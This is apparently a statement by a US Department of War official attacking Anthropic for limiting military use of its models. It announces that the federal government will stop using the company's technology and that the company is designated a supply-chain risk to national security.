    This week, Anthropic delivered a master class in arrogance and betrayal as well as a textbook case of how not to do business with the United States Government or the Pentagon. Our position has never wavered and will never waver: the Department of War must have full, unrestricted access to Anthropic’s models for every LAWFUL purpose in defense of the Republic. Instead, @AnthropicAI and its CEO @DarioAmodei, have chosen duplicity. Cloaked in the sanctimonious rhetoric of “effective altruism,” they have attempted to strong-arm the United States military into submission - a cowardly act of corporate virtue-signaling that places Silicon Valley ideology above American lives. The Terms of Service of Anthropic’s defective altruism will never outweigh the safety, the readiness, or the lives of American troops on the battlefield. Their true objective is unmistakable: to seize veto power over the operational decisions of the United States military. That is unacceptable. As President Trump stated on Truth Social, the Commander-in-Chief and the American people alone will determine the destiny of our armed forces, not unelected tech executives. Anthropic’s stance is fundamentally incompatible with American principles. Their relationship with the United States Armed Forces and the Federal Government has therefore been permanently altered. In conjunction with the President's directive for the Federal Government to cease all use of Anthropic's technology, I am directing the Department of War to designate Anthropic a Supply-Chain Risk to National Security. Effective immediately, no contractor, supplier, or partner that does business with the United States military may conduct any commercial activity with Anthropic. Anthropic will continue to provide the Department of War its services for a period of no more than six months to allow for a seamless transition to a better and more patriotic service. America’s warfighters will never be held hostage by the ideological whims of Big Tech. This decision is final.